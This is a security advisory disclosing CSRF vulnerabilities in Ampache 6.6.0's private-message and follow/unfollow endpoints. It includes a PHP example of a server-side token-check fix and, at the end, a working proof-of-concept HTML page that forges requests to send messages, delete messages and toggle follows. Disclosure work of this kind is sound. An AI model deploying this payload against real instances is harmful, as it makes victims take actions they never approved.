Product detail

Affected product: Ampache
Affected version: 6.6.0
Affected component: private message and follow/unfollow

Multiple Cross-Site Request Forgery (CSRF) vulnerabilities exist in the private messaging and follower/following functions in Ampache versions up to 6.6.0. These vulnerabilities affect the endpoints 'pvmsg.php?action=add_message', 'pvmsg.php?action=confirm_delete', and 'ajax.server.php?page=user&action=flip_follow', allowing an attacker to perform unauthorized actions on behalf of a logged-in user, such as sending or deleting private messages and following or unfollowing users, without that user's consent.


Prerequisite

Install Ampache from the official Ampache GitHub repository.

Ampache version 6.6.0 was released on Aug 1.


Installed Ampache version 6.6.0



Exploitation

The form_validation parameter is used as an anti-CSRF token in many endpoints, including the admin functions.

The image below shows that if the form_validation value is invalid or removed from the request, the server responds with 403 Access denied.

However, for actions such as sending or deleting private messages, and following or unfollowing users, the form_validation parameter is not enforced.
We can send an empty value or remove the parameter entirely, and the server still accepts the request.


For the send private message API, the form_validation parameter is present in the request:

However, the check can be bypassed by removing the form_validation parameter from the request.

The delete private message API is the same case as send private message: the form_validation parameter is present in the request.

But the request is still accepted when form_validation is sent with an empty value or removed altogether.

In the case of follow/unfollow actions, the form_validation parameter is not used at all, and no other anti-CSRF token is checked.
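
The fix on the server side is to apply the same form_validation check that already protects the admin functions to the three endpoints above, and to treat a missing or empty token as a failure rather than a pass. The PHP below is an added illustration of that pattern; it is not Ampache's own code, and the function names (csrf_token_for, csrf_hidden_field, csrf_verify, handle_request), the session key and the PROTECTED_ACTIONS table are assumptions made for the example. It runs stand-alone from the command line against a constructed in-memory session.

```php
<?php
// Added example (not Ampache's own code): one server-side anti-CSRF check applied
// uniformly to the three endpoints named in the advisory. Function names, the
// session key and the PROTECTED_ACTIONS table are hypothetical.
declare(strict_types=1);

const CSRF_SESSION_KEY = 'form_validation_tokens';

// Generate (or reuse) a per-session, per-form token.
function csrf_token_for(string $formName): string
{
    if (!isset($_SESSION[CSRF_SESSION_KEY][$formName])) {
        $_SESSION[CSRF_SESSION_KEY][$formName] = bin2hex(random_bytes(32));
    }
    return $_SESSION[CSRF_SESSION_KEY][$formName];
}

// Hidden field to embed in the application's own form (escaped for HTML).
function csrf_hidden_field(string $formName): string
{
    $token = htmlspecialchars(csrf_token_for($formName), ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="form_validation" value="' . $token . '">';
}

// Verify the submitted token. The property that matters for this advisory:
// a missing, empty or non-string form_validation value is rejected, and the
// comparison is constant-time.
function csrf_verify(string $formName, array $post): bool
{
    $expected  = $_SESSION[CSRF_SESSION_KEY][$formName] ?? '';
    $submitted = $post['form_validation'] ?? '';

    if (!is_string($submitted) || $submitted === '' || $expected === '') {
        return false;
    }
    return hash_equals($expected, $submitted);
}

// State-changing actions that act on behalf of the logged-in user. All of
// them, not only the admin functions, go through the same check.
const PROTECTED_ACTIONS = [
    'pvmsg.php'       => ['add_message', 'confirm_delete'],
    'ajax.server.php' => ['flip_follow'],
];

// Returns the HTTP status the endpoint would answer with.
function handle_request(string $script, string $action, string $method, array $post): int
{
    if (!in_array($action, PROTECTED_ACTIONS[$script] ?? [], true)) {
        return 200;
    }
    // A state change must be a POST; a GET-triggered follow/unfollow would be
    // reachable from a plain <img> tag without any form at all.
    if ($method !== 'POST') {
        return 405;
    }
    if (!csrf_verify($script . ':' . $action, $post)) {
        return 403; // "Access denied", the same answer the admin endpoints give
    }
    return 200;
}

// Demonstration with a constructed session; no real Ampache instance involved.
$_SESSION = [];
$token = csrf_token_for('pvmsg.php:add_message');

echo "form field rendered into the page: " . csrf_hidden_field('pvmsg.php:add_message') . "\n";
// Legitimate submission from the application's own form carries the token.
echo "legitimate add_message: " . handle_request('pvmsg.php', 'add_message', 'POST',
    ['to_user' => 'test', 'subject' => 't', 'message' => 't', 'form_validation' => $token]) . "\n";
// Cross-site form with no form_validation field at all.
echo "add_message, token removed: " . handle_request('pvmsg.php', 'add_message', 'POST',
    ['to_user' => 'test', 'subject' => 't', 'message' => 't']) . "\n";
// Cross-site form sending an empty form_validation value.
echo "confirm_delete, empty token: " . handle_request('pvmsg.php', 'confirm_delete', 'POST',
    ['form_validation' => '']) . "\n";
// flip_follow with no token; today this endpoint checks nothing.
echo "flip_follow, no token: " . handle_request('ajax.server.php', 'flip_follow', 'POST', []) . "\n";
```

For the AJAX follow/unfollow endpoint there is no HTML form to carry a hidden field, so the page's own script has to send the same token as a request parameter or a custom header, and the endpoint verifies it with the identical csrf_verify call. The key regression test after a fix is the third and fourth cases above: an empty form_validation and a missing one must both produce 403, not 200.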

The CSRF HTML page below demonstrates the attack; the victim must click one of the buttons while logged in to Ampache.


<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>CSRF Attack</title>
</head>
<body>
    <!-- Case 1: send private message, no form_validation field in the request -->
    <form id="csrfFormMessage" action="http://localhost/pvmsg.php?action=add_message" method="POST">
        <input type="hidden" name="to_user" value="test">
        <input type="hidden" name="subject" value="test_csrf">
        <input type="hidden" name="message" value="test_csrf">
        <button type="submit">Send Message</button>
    </form>
    <br><br>
    <button id="deleteMessagesButton">Delete Messages</button>
    <br><br>
    <button id="flipFollowButton">Follow/Unfollow User</button>
    <script>
        // Case 2: delete private message, form_validation sent with an empty value
        document.getElementById('deleteMessagesButton').addEventListener('click', function() {
            let form = document.createElement('form');
            form.method = 'POST';
            form.action = 'http://localhost/pvmsg.php?action=confirm_delete&msgs=52';
            let input = document.createElement('input');
            input.type = 'hidden';
            input.name = 'form_validation';
            input.value = '';
            form.appendChild(input);
            document.body.appendChild(form);
            form.submit();
            document.body.removeChild(form);
        });
        // Case 3: follow/unfollow, endpoint checks no token at all
        document.getElementById('flipFollowButton').addEventListener('click', function() {
            let form = document.createElement('form');
            form.method = 'POST';
            form.action = 'http://localhost/server/ajax.server.php?page=user&action=flip_follow&user_id=2';
            document.body.appendChild(form);
            form.submit();
            document.body.removeChild(form);
        });
    </script>
</body>
</html>

CSRF case: send private message

CSRF case: delete private message

CSRF case: follow/unfollow